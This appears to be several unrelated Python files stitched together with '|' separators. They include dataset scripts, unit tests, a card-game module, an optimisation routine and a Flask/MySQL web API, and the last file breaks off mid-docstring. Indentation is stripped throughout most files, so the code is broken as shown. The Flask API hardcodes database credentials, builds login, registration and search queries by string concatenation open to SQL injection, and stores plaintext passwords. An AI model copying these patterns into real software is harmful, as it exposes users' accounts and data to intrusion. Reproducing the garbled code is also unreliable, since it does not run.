#----------------------------------------------------------------------------------------------
'''
What to expect from this script:
1- This will generate lists of patients with sepsis and without sepsis in each set.
2- More details are provided in the CSV files "info_training_train/test".
'''
#----------------------------------------------------------------------------------------------
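# Expected outputs, written to <MAIN_DIR><train|test>_info/ for each split:
#   info_training_<split>.csv           per-patient summary (demographics, nb_samples, SepsisLabel)
#   yes_Sepsis_subject_id_<split>.csv   subject_ids with SepsisLabel == 1 at any time point
#   no_Sepsis_subject_id_<split>.csv    subject_ids that never have SepsisLabel == 1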
import os
from multiprocessing import Pool, cpu_count
import pandas as pd
import numpy as np
import sys
from sys import platform
from IPython.display import display, HTML
pd.set_option('display.max_columns', 500)
pd.set_option('display.max_rows', 500)
import time
from sklearn.preprocessing import normalize
from tqdm import tqdm
def get_subjects(list_of_examples):
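    """Summarise one patient file per row: each '|'-separated file is read and the
    column-wise max of the demographic/label columns is kept, so SepsisLabel == 1
    flags patients who develop sepsis at any time point and ICULOS becomes the
    number of samples (renamed to nb_samples below)."""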
cols =['subject_id','Age', 'Gender', 'Unit1', 'Unit2', 'HospAdmTime', 'ICULOS', 'SepsisLabel'] #list(patient.columns[-7:])
subjects= pd.DataFrame([], columns=cols)
i=0
for file in list_of_examples: # tqdm(list_of_examples)
subject = pd.read_csv(file, sep = "|")
subject_details = list(subject[cols[1:]].max().values)
subject_details.insert(0,file.split('.')[0])
subjects.loc[i]=subject_details
i+=1
subjects.rename(columns={'ICULOS':'nb_samples'}, inplace=True)
return subjects
def generate_info():
for INP_DIR in [TRAIN_DIR, TEST_DIR]:
if "train" in INP_DIR:
prefix= "train"
else:
prefix = 'test'
os.chdir(INP_DIR)
list_of_files_train= os.listdir(INP_DIR)
n= round(len(list_of_files_train)/cpu_count())
print('n value is ...{}'.format(n))
files= [list_of_files_train[i:i + n] for i in range(0, len(list_of_files_train), n)]
with Pool(processes=cpu_count()) as pool:
res1 = pool.map(get_subjects, files)
subjects = pd.concat(res1)
del res1
        # IDs of subjects with Sepsis
Sepsis_subjects_id= subjects.loc[subjects.SepsisLabel.isin([1])].subject_id.values
        # IDs of subjects without Sepsis
wihoutSepsis_subjects_id= subjects.loc[subjects.SepsisLabel.isin([0])].subject_id.values
# save files
output_directory = MAIN_DIR +prefix+'_info'
if not os.path.isdir(output_directory):
os.mkdir(output_directory)
save_file = os.path.join(output_directory, "info_training_"+prefix+".csv")
subjects.to_csv(save_file, index=False)
save_file = os.path.join(output_directory, "no_Sepsis_subject_id_"+prefix+".csv")
pd.DataFrame(wihoutSepsis_subjects_id,
columns=['subject_id']).to_csv(save_file, index=False)
save_file = os.path.join(output_directory, "yes_Sepsis_subject_id_"+prefix+".csv")
pd.DataFrame(Sepsis_subjects_id, columns=['subject_id']).to_csv(save_file, index=False)
print(prefix)
        print("working in this directory ..... " + INP_DIR)
print('generated the following files.....')
print(os.listdir(output_directory))
if __name__ == '__main__':
#----------------------------------------------------------------------------------------------
# how to run the code :
    #---------------- Define MAIN_DIR : the directory that contains the train_data/ and test_data/ folders
MAIN_DIR = sys.argv[1]
#----------------------------------------------------------------------------------------------
TRAIN_DIR= MAIN_DIR +'train_data/'
TEST_DIR = MAIN_DIR +'test_data/'
train_files = os.listdir(TRAIN_DIR)
test_files = os.listdir(TEST_DIR)
# generate files
generate_info()
|
# -*- coding: UTF-8 -*-
# Python Exercise 34: Write a program that asks for an employee's salary and computes the raise. Salaries above R$1250.00 get a 10% raise; salaries at or below that get a 15% raise.
from time import sleep
print("-=-=--=-=--=-=--=-=- |SISTEMA FINANCEIRO| -=-=--=-=--=-=--=-=-")
salario = float(input("Caro trabalhador, informe o valor da sua remuneração: "))
print("PROCESSANDO...\n")
sleep(3)
if salario <= 1250:
salario = salario + (salario * 15 / 100)
print(f"Você recebeu um aumento de 15%\nSeu salário atualizado é: R$ {salario:.2f}\n")
else:
salario = salario + (salario * 10 / 100)
print(f"Você recebeu um aumento de 10%\nSeu salário atualizado é: R$ {salario:.2f}\n")
print("-=-=--=-=--=-=--=-=- |OPERAÇÃO FINALIZADA| -=-=--=-=--=-=--=-=-")
|
from guillotina.tests.utils import make_mocked_request
from guillotina_amqp.utils import make_request
from guillotina_amqp.utils import metric_measure
from guillotina_amqp.utils import serialize_request
import pytest
class MockPrometheusMetric:
def __init__(self, labels=None):
self.labels_called = False
self.observe_called = False
self._values = []
self._labels = {label: None for label in labels} if labels else {}
def labels(self, **labels):
self.labels_called = True
for label, value in labels.items():
if label not in self._labels:
raise Exception()
self._labels[label] = value
return self
def observe(self, value):
self.observe_called = True
self._values.append(value)
def test_metric_measure():
# Measure with None metric just returns
metric_measure(None, "foo", "bar")
# Measure fills labels and observe
histogram = MockPrometheusMetric(["label1", "label2"])
metric_measure(histogram, 20, {"label1": "foo", "label2": "bar"})
assert histogram.labels_called
assert histogram.observe_called
assert histogram._labels["label1"] == "foo"
assert histogram._labels["label2"] == "bar"
assert histogram._values == [20]
@pytest.mark.asyncio
async def test_serialize_request():
request = make_mocked_request(
"POST", "http://foobar.com", {"X-Header": "1"}, b"param1=yes,param2=no"
)
request.annotations = {"foo": "bar"}
serialized = serialize_request(request)
assert serialized["url"] == request.url
assert serialized["method"] == request.method
assert serialized["headers"] == dict(request.headers)
assert serialized["annotations"] == request.annotations
@pytest.mark.asyncio
async def test_make_request():
serialized = {
"annotations": {"_corr_id": "foo"},
"headers": {"Host": "localhost", "X-Header": "1"},
"method": "POST",
"url": "http://localhost/http://foobar.com?param1=yes,param2=no",
}
base_request = make_mocked_request("GET", "http://bar.ba", {"A": "2"}, b"caca=tua")
request = make_request(base_request, serialized)
assert serialized["url"] == request.url
assert serialized["method"] == request.method
assert serialized["headers"] == dict(request.headers)
assert serialized["annotations"] == request.annotations
|
'''
Creates a user, item, rating, user_id, item_label CSV file
for the CORD-19 corpus.
'''
import pandas as pd
import configargparse
from data import *
import sys
import json
from create_rec_sys_dataset import *
import numpy as np
import unidecode
import rdflib
from rdflib import URIRef
pd.set_option('display.max_columns', None)
pd.set_option("display.max_rows", None)
def id_to_index(df):
"""
    Maps user values to the lowest consecutive integer indices.
    :param df: pandas DataFrame with columns user, item, rating
    :return: the same DataFrame with an added index_user column
"""
index_user = np.arange(0, len(df.user.unique()))
df_user_index = pd.DataFrame(df.user.unique(), columns=["user"])
df_user_index["new_index"] = index_user
df["index_user"] = df["user"].map(df_user_index.set_index('user')["new_index"]).fillna(0)
#print(df)
return df
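# Illustrative example: for df.user == ['a', 'b', 'a'] the unique users ['a', 'b']
# receive consecutive indices 0 and 1, so the new index_user column is [0, 1, 0].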
def load_ontology(onto_path):
g = rdflib.Graph()
g.load(onto_path)
return g
def get_entities_labels(list_of_entities, chebi, hp, go, do ):
entities = []
count = 0
    for id in list_of_entities:
        lab = None  # fall back to None when the ID prefix is not recognised
        uri = URIRef('http://purl.obolibrary.org/obo/' + id)
if id.startswith('CHEBI'):
lab = chebi.label(uri)
elif id.startswith('GO'):
lab = go.label(uri)
elif id.startswith('HP'):
lab = hp.label(uri)
elif id.startswith('DO'):
lab = do.label(uri)
entities.append(lab)
return entities
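# Note: each entity ID is looked up in the ontology graph matching its prefix
# (CHEBI, GO, HP or DO); IDs with any other prefix are appended as None.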
if __name__ == '__main__':
p = configargparse.ArgParser(default_config_files=['../config/config.ini'])
p.add('-mc', '--my-config', is_config_file=True, help='alternative config file path')
p.add("-oj", "--path_to_original_json_folder", required=False, help="path to original json", type=str)
p.add("-ej", "--path_to_entities_json_folder", required=False, help="path to entities json", type=str)
p.add("-pathcsv", "--path_to_csv", required=False, help="path to final csv", type=str)
p.add("-pathchebi", "--path_chebi", required=False, help="path to metadata", type=str)
p.add("-pathdo", "--path_do", required=False, help="path to metadata", type=str)
p.add("-pathgo", "--path_go", required=False, help="path to metadata", type=str)
p.add("-pathhp", "--path_hp", required=False, help="path to metadata", type=str)
options = p.parse_args()
original_json_folder = options.path_to_original_json_folder
entities_json_folder = options.path_to_entities_json_folder
path_to_final_csv = options.path_to_csv
path_chebi = options.path_chebi
path_do = options.path_do
path_go = options.path_go
path_hp = options.path_hp
entities_list_of_json_files = list_files_in_directory(entities_json_folder)
user_item_rating_all = []
count = 0
for file in entities_list_of_json_files:
print(count, "-", len(entities_list_of_json_files))
j_file_entities = open_json_file_pd(entities_json_folder, file)
df_entities = get_entities_id(get_entities(j_file_entities))
article_id = get_article_id(j_file_entities)
j_file_original = open_json_file(original_json_folder, article_id)
list_of_authors = get_authors_names(j_file_original)
user_item_rating = get_user_item_rating(list_of_authors, df_entities)
user_item_rating_all.append(user_item_rating)
count+=1
flat_list = []
for sublist in user_item_rating_all:
for item in sublist:
flat_list.append(item)
array = np.array(flat_list)
final_data = pd.DataFrame(array, columns=['user', 'item', 'rating'])
sum_df = final_data.groupby(['user', 'item']).size().reset_index().rename(columns={0: 'rating'})
df_with_user_id = id_to_index(sum_df)
### get entities labels
list_of_entities = df_with_user_id.item.unique()
print(list_of_entities)
###load ontos
chebi = load_ontology(path_chebi)
print("chebi")
do = load_ontology(path_do)
print('do')
go = load_ontology(path_go)
print('go')
hp = load_ontology(path_hp)
print('hp')
df_user_id = df_with_user_id[['index_user', 'item', 'rating']]
df_user_name = df_with_user_id[['index_user', 'item', 'rating']]
entities_label = get_entities_labels(list_of_entities, chebi, hp, go, do)
print(entities_label)
df_entities = pd.DataFrame(list_of_entities, columns=["item_id"])
df_entities["entity_name"] = np.array(entities_label)
print('mapping labels')
df_with_user_id["item_name"] = df_with_user_id["item"].map(df_entities.set_index('item_id')["entity_name"]).fillna(0)
# print(df)
print('saving')
df_with_user_id.to_csv(path_to_final_csv, index=False, header=False)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Script taken from http://stackoverflow.com/a/17579949/4070143 by inspectorG4dget
# to remove lines above and below certain string match.
# Minor modifications to read and write from stdin/stdout respectively
# and to remove some extra newlines getting added
import sys
def remLines(delim, above, below):
buff = []
line = sys.stdin.readline()
while line:
if delim in line.strip():
buff = []
for _ in range(below):
sys.stdin.readline()
else:
if len(buff) == above:
print(buff[0].replace('\r', '').replace('\n', ''))
buff = buff[1:]
buff.append(line)
line = sys.stdin.readline()
print(''.join(buff).strip())
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Error: no search pattern specified")
else:
remLines(sys.argv[1], 2, 1)
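# Example usage (hypothetical filenames): drop every line containing PATTERN
# together with the 2 lines above and 1 line below it:
#   cat input.txt | python remove_lines.py PATTERN > output.txt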
|
from flask import Flask, jsonify, request
import pymysql
app = Flask(__name__)
class Database:
def __init__(self):
host = "csc648.cxyapjc8a04v.us-west-1.rds.amazonaws.com"
user = "admin"
password = "rdsmysql"
db = "proddb"
self.con = pymysql.connect(host=host, user=user, password=password, db=db, cursorclass=pymysql.cursors.
DictCursor, autocommit=True)
self.cur = self.con.cursor()
def list_categories(self):
self.cur.execute("SELECT product_category_name FROM product_categories LIMIT 50")
result = self.cur.fetchall()
return result
def list_members(self):
self.cur.execute("SELECT first_name FROM Team_Members LIMIT 50")
result = self.cur.fetchall()
return result
def list_category_entries(self, categoryname):
query = "SELECT * FROM " + str(categoryname) + "_products LIMIT 50"
self.cur.execute(query)
result = self.cur.fetchall()
return result
def list_all_category_entries(self, paramobjects):
product_categories = ["class_notes", "video", "music"]
product_fields = ["product_name", "product_file_size", "product_description", "product_author"]
result = []
for category in product_categories:
if "search_query" in paramobjects and len(paramobjects) == 1:
for field in product_fields:
query = "SELECT * FROM " + category + "_products WHERE " + field + " LIKE '%" + \
paramobjects[
"search_query"] + "%' LIMIT 50"
self.cur.execute(query)
result += self.cur.fetchall()
return result
elif len(paramobjects) == 0:
query = "SELECT * FROM " + category + "_products LIMIT 50"
self.cur.execute(query)
result += self.cur.fetchall()
for field in product_fields:
if field in paramobjects:
query = "SELECT * FROM " + category + "_products WHERE " + field + " LIKE '%" + \
paramobjects[
field] + "%' LIMIT 50"
self.cur.execute(query)
result += self.cur.fetchall()
return result
# this function will return any entry where any field matches the search_query url parameter or if a field is specified. FROM SPECIFIED CATEGORY
def list_search_query_entries(self, categoryname, paramsobject):
product_fields = ["product_name", "product_file_size", "product_description", "product_author"]
if "search_query" in paramsobject and len(paramsobject) == 1:
result = []
for field in product_fields:
query = "SELECT * FROM " + str(categoryname) + "_products WHERE " + field + " LIKE '%" + paramsobject[
"search_query"] + "%' LIMIT 50"
self.cur.execute(query)
result += self.cur.fetchall()
return result
for field in product_fields:
if field in paramsobject:
query = "SELECT * FROM " + str(categoryname) + "_products WHERE " + field + " LIKE '%" + paramsobject[
field] + "%' LIMIT 50"
self.cur.execute(query)
return self.cur.fetchall()
def check_is_unregistered(self, email):
query = "SELECT email FROM registered_users WHERE email ='" + email + "'"
return not bool(self.cur.execute(query))
def check_is_registered(self, email):
query = "SELECT email FROM registered_users WHERE email ='" + email + "'"
return bool(self.cur.execute(query))
def authenticate_login(self, content):
query = "SELECT email,first_name,last_name,id FROM registered_users WHERE email ='" + content[
'email'] + "' AND password ='" + content['password'] + "'"
if bool(self.cur.execute(query)):
return self.cur.fetchall()
def register_user(self, registration_info):
query = "INSERT INTO registered_users(id,email,password,first_name,last_name) VALUES (0,'" + registration_info[
'email'] + "','" + registration_info['password'] + "','" + registration_info['first_name'] + "','" + \
registration_info['last_name'] + "')"
print(query)
print(self.cur.execute(query))
# this function returns all requested data searched from given category
@app.route('/api/search/<category>')
def get_search(category):
db = Database()
paramsobject = request.args
fixed_case = str(category.lower())
if category == "all" or category == "All":
emps = db.list_all_category_entries(paramsobject)
return jsonify(emps)
# capitalize all first letters of a category
# fixed_case = fixed_case.capitalize()
print(fixed_case)
if len(paramsobject) == 0:
emps = db.list_category_entries(fixed_case)
else:
emps = db.list_search_query_entries(fixed_case, paramsobject)
return jsonify(emps)
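# Example requests (hypothetical host): GET /api/search/music returns up to 50 rows
# from music_products, while GET /api/search/all?search_query=piano searches the
# product_name, product_file_size, product_description and product_author fields
# of every category table.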
# this function returns the list of categories
@app.route('/api/search')
def list_categories():
db = Database()
emps = db.list_categories()
return jsonify(emps)
@app.route('/api/register', methods=['POST'])
def registerNewUser():
db = Database()
content = request.get_json()
if db.check_is_unregistered(content['email']):
db.register_user(content)
#return content['email'] + " has been registered"
return content['email']
else:
return ""
#return content['email'] + " is already registered,check email and try again"
@app.route('/api/login', methods=['POST'])
def loginUser():
db = Database()
content = request.get_json()
    if db.check_is_registered(content['email']):
        return jsonify(db.authenticate_login(content))
    return ""
# this is for the flask team to test new functionality easily by calling the /api/test endpoint
# this function will only test whatever code is inside test(). you are welcome to erase the definition to test your own
@app.route('/api/test')
def test():
db = Database()
paramsobject = request.args['search_query']
emps = db.list_all_category_entries(paramsobject)
return jsonify(emps)
# app run
app.run(debug=True)
|
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
import src.pattern.PatternBuilder as PB
def test_build3():
colorsA = [0, 0, 0, 10, 10, 10, 1, 1, 1, 11, 11, 11, 2, 2, 2, 12, 12, 12, 3, 3, 3, 13, 13, 13, 4, 4, 4, 14, 14, 14, 5, 5, 5, 15, 15, 15, 6, 6, 6, 16, 16, 16, 7, 7, 7, 17, 17, 17, 8, 8, 8, 18, 18, 18, 9, 9, 9, 19, 19, 19]
colorsB = [20, 20, 20, 21, 21, 21, 30, 30, 30, 22, 22, 22, 23, 23, 23, 31, 31, 31, 24, 24, 24, 25, 25, 25, 32, 32, 32, 26, 26, 26, 27, 27, 27, 33, 33, 33, 28, 28, 28, 29, 29, 29, 34, 34, 34]
colorsC = [35, 35, 35, 36, 36, 36, 37, 37, 37, 38, 38, 38, 39, 39, 39]
expected = [i for eyes in [[n, n, n] for n in range(40)] for i in eyes]
result = PB.build3([colorsA, colorsB, colorsC])
assert(expected == result)
test_build3()
|
import copy
from hearthbreaker.constants import CHARACTER_CLASS, CARD_RARITY, MINION_TYPE
from hearthbreaker.game_objects import Card, Minion, MinionCard, SecretCard
import hearthbreaker.targeting
class ArcaneMissiles(Card):
def __init__(self):
super().__init__("Arcane Missiles", 1, CHARACTER_CLASS.MAGE, CARD_RARITY.FREE)
def use(self, player, game):
super().use(player, game)
for i in range(0, player.effective_spell_damage(3)):
targets = copy.copy(game.other_player.minions)
targets.append(game.other_player.hero)
target = game.random_choice(targets)
target.damage(1, self)
class IceLance(Card):
def __init__(self):
super().__init__("Ice Lance", 1, CHARACTER_CLASS.MAGE, CARD_RARITY.COMMON,
hearthbreaker.targeting.find_spell_target)
def use(self, player, game):
super().use(player, game)
if self.target.frozen:
self.target.damage(4, self)
else:
self.target.freeze()
class MirrorImage(Card):
def __init__(self):
super().__init__("Mirror Image", 1, CHARACTER_CLASS.MAGE, CARD_RARITY.COMMON)
def use(self, player, game):
super().use(player, game)
class MirrorImageMinion(MinionCard):
def __init__(self):
super().__init__("Mirror Image", 0, CHARACTER_CLASS.MAGE, CARD_RARITY.SPECIAL)
def create_minion(self, p):
minion = Minion(0, 2)
minion.taunt = True
return minion
for i in range(0, 2):
mirror_image = MirrorImageMinion()
mirror_image.summon(player, game, len(player.minions))
class ArcaneExplosion(Card):
def __init__(self):
super().__init__("Arcane Explosion", 2, CHARACTER_CLASS.MAGE, CARD_RARITY.FREE)
def use(self, player, game):
super().use(player, game)
for minion in copy.copy(game.other_player.minions):
minion.damage(player.effective_spell_damage(1), self)
class Frostbolt(Card):
def __init__(self):
super().__init__("Frostbolt", 2, CHARACTER_CLASS.MAGE, CARD_RARITY.COMMON,
hearthbreaker.targeting.find_spell_target)
def use(self, player, game):
super().use(player, game)
self.target.damage(player.effective_spell_damage(3), self)
self.target.freeze()
class ArcaneIntellect(Card):
def __init__(self):
super().__init__("Arcane Intellect", 3, CHARACTER_CLASS.MAGE, CARD_RARITY.FREE)
def use(self, player, game):
super().use(player, game)
for c in range(0, 2):
player.draw()
class FrostNova(Card):
def __init__(self):
super().__init__("Frost Nova", 3, CHARACTER_CLASS.MAGE,
CARD_RARITY.COMMON)
def use(self, player, game):
super().use(player, game)
for minion in game.other_player.minions:
minion.freeze()
class Counterspell(SecretCard):
def __init__(self):
super().__init__("Counterspell", 3, CHARACTER_CLASS.MAGE, CARD_RARITY.RARE)
def use(self, player, game):
super().use(player, game)
def _reveal(self, card):
card.cancel = True
super().reveal()
def activate(self, player):
player.game.current_player.bind("spell_cast", self._reveal)
def deactivate(self, player):
player.game.current_player.unbind("spell_cast", self._reveal)
class IceBarrier(SecretCard):
def __init__(self):
super().__init__("Ice Barrier", 3, CHARACTER_CLASS.MAGE,
CARD_RARITY.COMMON)
def _reveal(self, attacker):
attacker.player.game.other_player.hero.armor += 8
super().reveal()
def activate(self, player):
player.hero.bind("attacked", self._reveal)
def deactivate(self, player):
player.hero.unbind("attacked", self._reveal)
class MirrorEntity(SecretCard):
def __init__(self):
super().__init__("Mirror Entity", 3, CHARACTER_CLASS.MAGE, CARD_RARITY.COMMON)
self.player = None
def _reveal(self, minion):
mirror = minion.copy(self.player)
mirror.add_to_board(len(self.player.minions))
super().reveal()
def activate(self, player):
player.game.current_player.bind("minion_played", self._reveal)
self.player = player
def deactivate(self, player):
player.game.current_player.unbind("minion_played", self._reveal)
self.player = None
class Spellbender(SecretCard):
def __init__(self):
super().__init__("Spellbender", 3, CHARACTER_CLASS.MAGE,
CARD_RARITY.EPIC)
self.player = None
def _reveal(self, card):
if len(self.player.minions) < 7 and card.targetable:
class SpellbenderMinion(MinionCard):
def __init__(self):
super().__init__("Spellbender", 0, CHARACTER_CLASS.MAGE, CARD_RARITY.SPECIAL)
def create_minion(self, p):
return Minion(1, 3)
def choose_bender(targets):
target = old_target(targets)
if isinstance(target, Minion):
spell_bender = SpellbenderMinion()
# According to http://us.battle.net/hearthstone/en/forum/topic/10070927066, Spellbender
# will not activate if there are too many minions
spell_bender.summon(self.player, self.player.game, len(self.player.minions))
self.player.game.current_player.agent.choose_target = old_target
bender = self.player.minions[-1]
super(Spellbender, self).reveal()
return bender
else:
return target
old_target = self.player.game.current_player.agent.choose_target
self.player.game.current_player.agent.choose_target = choose_bender
def activate(self, player):
player.game.current_player.bind("spell_cast", self._reveal)
self.player = player
def deactivate(self, player):
player.game.current_player.unbind("spell_cast", self._reveal)
self.player = None
class Vaporize(SecretCard):
def __init__(self):
super().__init__("Vaporize", 3, CHARACTER_CLASS.MAGE, CARD_RARITY.RARE)
def _reveal(self, attacker):
if type(attacker) is Minion and not attacker.removed:
attacker.die(self)
attacker.game.check_delayed()
super().reveal()
def activate(self, player):
player.hero.bind("attacked", self._reveal)
def deactivate(self, player):
player.hero.unbind("attacked", self._reveal)
class IceBlock(SecretCard):
def __init__(self):
super().__init__("Ice Block", 3, CHARACTER_CLASS.MAGE, CARD_RARITY.EPIC)
self.player = None
def _reveal(self, amount, attacker):
hero = self.player.hero
if hero.health - amount <= 0:
hero.immune = True
hero.health += amount
# TODO Check if this spell will also prevent damage to armor.
super().reveal()
def activate(self, player):
player.hero.bind("hero_damaged", self._reveal)
self.player = player
def deactivate(self, player):
player.hero.unbind("hero_damaged", self._reveal)
self.player = None
class ConeOfCold(Card):
def __init__(self):
super().__init__("Cone of Cold", 4, CHARACTER_CLASS.MAGE, CARD_RARITY.COMMON,
hearthbreaker.targeting.find_minion_spell_target)
def use(self, player, game):
super().use(player, game)
self.target.freeze()
index = self.target.index
if self.target.index < len(self.target.player.minions) - 1:
minion = self.target.player.minions[index + 1]
minion.damage(player.effective_spell_damage(1), self)
minion.freeze()
self.target.damage(player.effective_spell_damage(1), self)
if self.target.index > 0:
minion = self.target.player.minions[index - 1]
minion.damage(player.effective_spell_damage(1), self)
minion.freeze()
class Fireball(Card):
def __init__(self):
super().__init__("Fireball", 4, CHARACTER_CLASS.MAGE, CARD_RARITY.FREE,
hearthbreaker.targeting.find_spell_target)
def use(self, player, game):
super().use(player, game)
self.target.damage(player.effective_spell_damage(6), self)
class Polymorph(Card):
def __init__(self):
super().__init__("Polymorph", 4, CHARACTER_CLASS.MAGE, CARD_RARITY.FREE,
hearthbreaker.targeting.find_minion_spell_target)
def use(self, player, game):
super().use(player, game)
class Sheep(MinionCard):
def __init__(self):
super().__init__("Sheep", 0, CHARACTER_CLASS.ALL, CARD_RARITY.SPECIAL, MINION_TYPE.BEAST)
def create_minion(self, p):
return Minion(1, 1)
sheep = Sheep()
minion = sheep.create_minion(None)
minion.card = sheep
self.target.replace(minion)
class Blizzard(Card):
def __init__(self):
super().__init__("Blizzard", 6, CHARACTER_CLASS.MAGE, CARD_RARITY.RARE)
def use(self, player, game):
super().use(player, game)
for minion in copy.copy(game.other_player.minions):
minion.damage(player.effective_spell_damage(2), self)
minion.freeze()
class Flamestrike(Card):
def __init__(self):
super().__init__("Flamestrike", 7, CHARACTER_CLASS.MAGE, CARD_RARITY.COMMON)
def use(self, player, game):
super().use(player, game)
for minion in copy.copy(game.other_player.minions):
minion.damage(player.effective_spell_damage(4), self)
class Pyroblast(Card):
def __init__(self):
super().__init__("Pyroblast", 10, CHARACTER_CLASS.MAGE, CARD_RARITY.EPIC,
hearthbreaker.targeting.find_spell_target)
def use(self, player, game):
super().use(player, game)
self.target.damage(player.effective_spell_damage(10), self)
class Duplicate(SecretCard):
def __init__(self):
super().__init__("Duplicate", 3, CHARACTER_CLASS.MAGE, CARD_RARITY.COMMON)
self.player = None
def activate(self, player):
player.bind("minion_died", self._reveal)
self.player = player
def deactivate(self, player):
player.unbind("minion_died", self._reveal)
self.player = None
def _reveal(self, minion, by):
for c in range(0, 2):
if len(self.player.hand) < 10:
self.player.hand.append(type(minion.card)())
super().reveal()
|
import numpy as np
import math
from .defaults import eps
from .util import find, add_value
from .polint import polint
from .gls.gls import gls
def csearch(fun, data, x, f, u, v, hess=None):
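    """Local coordinate search around x inside the box [u, v].

    For each coordinate a quadratic line search (gls/polint) is used to update the
    incumbent minimizer and to build gradient and Hessian estimates g and G; this
    appears to be a port of the csearch routine from the MATLAB MCS (Multilevel
    Coordinate Search) code.  Returns (xmin, fmi, g, G, nfcsearch), where
    nfcsearch is the number of function evaluations performed here."""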
n = len(x)
x = np.minimum(v, np.maximum(x, u))
nohess = False
if hess is None:
nohess = True
hess = np.ones((n, n))
nfcsearch = 0
smaxls = 6
small = 0.1
nloc = 1
xmin = x
fmi = f
xminnew = xmin
fminew = fmi
x1 = np.array([])
x2 = np.array([])
f1 = 0
f2 = 0
g = np.zeros((n, 1))
ind0 = np.array([])
for i in range(n):
p = np.zeros((n, 1))
p[i, 0] = 1
if xmin[i, 0]:
delta = math.pow(eps, 1/3) * abs(xmin[i])
else:
delta = math.pow(eps, 1/3)
linesearch = 1
if xmin[i, 0] <= u[i]:
f1 = fun(data, xmin+delta*p)
nfcsearch += 1
if f1 >= fmi:
f2 = fun(data, xmin+2*delta*p)
nfcsearch += 1
x1 = add_value(x1, i, xmin[i, 0] + delta)
x2 = add_value(x2, i, xmin[i, 0] + 2 * delta)
if f2 >= fmi:
xminnew[i, 0] = xmin[i, 0]
fminew = fmi
else:
xminnew[i, 0] = x2[i, 0]
fminew = f2
linesearch = 0
else:
alist = np.array([0, delta])
flist = np.array([fmi, f1])
elif xmin[i] >= v[i]:
            f1 = fun(data, xmin-delta*p)
            nfcsearch += 1
            if f1 >= fmi:
                f2 = fun(data, xmin-2*delta*p)
                nfcsearch += 1
                x1 = add_value(x1, i, xmin[i] - delta)
                x2 = add_value(x2, i, xmin[i] - 2 * delta)
if f2 >= fmi:
xminnew[i] = xmin[i]
fminew = fmi
else:
xminnew[i] = x2[i]
fminew = f2
linesearch = 0
else:
alist = np.array([0, -delta])
flist = np.array([fmi, f1])
else:
alist = 0
flist = fmi
if linesearch:
alist, flist, nfls = gls(fun, data, u, v,
xmin, p, alist, flist,
nloc, small, smaxls)
nfcsearch += nfls
            j = int(np.argmin(flist))
            fminew = flist[j]
if fminew == fmi:
j = find(alist, lambda x: x == 0)
ind = find(abs(alist-alist[j]), lambda x: x < delta)
ind1 = find(ind, lambda x: x == j)
ind[ind1] = []
alist[ind] = []
flist[ind] = []
                j = int(np.argmin(flist))
                fminew = flist[j]
xminnew[i] = xmin[i] + alist[j]
if i == 0 or not alist[j]:
if j == 1:
x1 = add_value(x1, i, xmin[i] + alist[1])
f1 = flist[1]
x2 = add_value(x2, i, xmin[i] + alist[2])
f2 = flist[2]
elif j == len(alist):
x1 = add_value(x1, i, xmin[i] + alist[j-1])
f1 = flist[j-1]
x2 = add_value(x2, i, xmin[i] + alist[j-2])
f2 = flist[j-2]
else:
x1 = add_value(x1, i, xmin[i] + alist[j-1])
                    f1 = flist[j-1]
x2 = add_value(x2, i, xmin[i] + alist[j+1])
f2 = flist[j+1]
xmin = add_value(xmin, i, xminnew[i])
fmi = fminew
else:
x1 = add_value(x1, i, xminnew[i])
f1 = fminew
                if xmin[i] < x1[i] and j < len(alist):
x2 = add_value(x2, i, xmin[i] + alist[j+1])
f2 = flist[j+1]
elif j == 1:
if alist[j+1]:
x2 = add_value(x2, i, xmin[i] + alist[j+1])
f2 = flist[j+1]
else:
x2 = add_value(x2, i, xmin[i] + alist[j+2])
f2 = flist[j+2]
elif alist[j-1]:
x2 = add_value(x2, i, xmin[i] + alist[j-1])
f2 = flist[j-1]
else:
x2 = add_value(x2, i, xmin[i] + alist[j-2])
f2 = flist[j-2]
g_val, G_val = polint([xmin[i], x1[i], x2[i]],
[fmi, f1, f2])
g = add_value(g, i, g_val)
G = add_value(G, (i, i), G_val)
x = xmin
k1 = 0
if f1 <= f2:
x[i] = x1[i]
else:
x[i] = x2[i]
for k in range(i-1):
if hess[i, k]:
q1 = fmi + g[k] * (x1[k]-xmin[k])+0.5*G[k, k]*math.pow((x1[k] - xmin[k]), 2)
q2 = fmi + g[k] * (x2[k]-xmin[k])+0.5*G[k, k]*math.pow((x2[k] - xmin[k]), 2)
if q1 <= q2:
x[k] = x1[k]
else:
x[k] = x2[k]
f12 = fun(data, x)
nfcsearch += 1
G = add_value(
G, (i, k),
hessian(i, k, x, xmin, f12, fmi, g, G))
G = add_value(G, (k, i), G[i, k])
if f12 < fminew:
fminew = f12
xminnew = x
k1 = k
x = add_value(x, k, xmin[k])
else:
G = add_value(G, (i, k), 0)
G = add_value(G, (k, i), 0)
if fminew <= fmi:
if x1[i] == xminnew[i]:
x1[i] = xmin[i]
elif x2[i] == xminnew[i]:
x2[i] = xmin[i]
if k1 > 0:
if xminnew[k1] == x1[k1]:
x1[k1] = xmin[k1]
elif xminnew[k1] == x2[k1]:
x2[k1] = xmin[k1]
for k in range(i):
g = add_value(
g, i,
g[k] + G[i, k] * (xminnew[i] - xmin[i])
)
if nohess and k1 > 0:
g = add_value(
g, k,
g[k] + G[k1, k] * (xminnew[k1] - xmin[k1])
)
xmin = xminnew
fmi = fminew
return xmin, fmi, g, G, nfcsearch
|
from unittest import TestCase
from django.http import HttpRequest
from django.test import override_settings
from wagtail.wagtailcore.models import Site
from v1.middleware import StagingMiddleware
class StagingMiddlewareTestCase(TestCase):
@override_settings(STAGING_HOSTNAME='content.localhost')
def test_request_on_www(self):
request = self.request_for_hostname('localhost')
StagingMiddleware().process_request(request)
self.assertFalse(request.is_staging)
@override_settings(STAGING_HOSTNAME='content.localhost')
def test_request_on_content(self):
request = self.request_for_hostname('content.localhost')
StagingMiddleware().process_request(request)
self.assertTrue(request.is_staging)
def request_for_hostname(self, hostname):
request = HttpRequest()
request.META['SERVER_NAME'] = hostname
request.site = Site.objects.get(hostname=hostname)
return request
|
from .market import *
from .etx import *
from .bond import *
|
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
# noinspection PyUnresolvedReferences
from six.moves import range
import numpy as np
import tensorflow as tf
from ..framework import Layer
from ..utils import tf_int_shape
class SpatialGlimpse(Layer):
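    """Extracts `depth` glimpses of increasing size (each subsequent scale grown by
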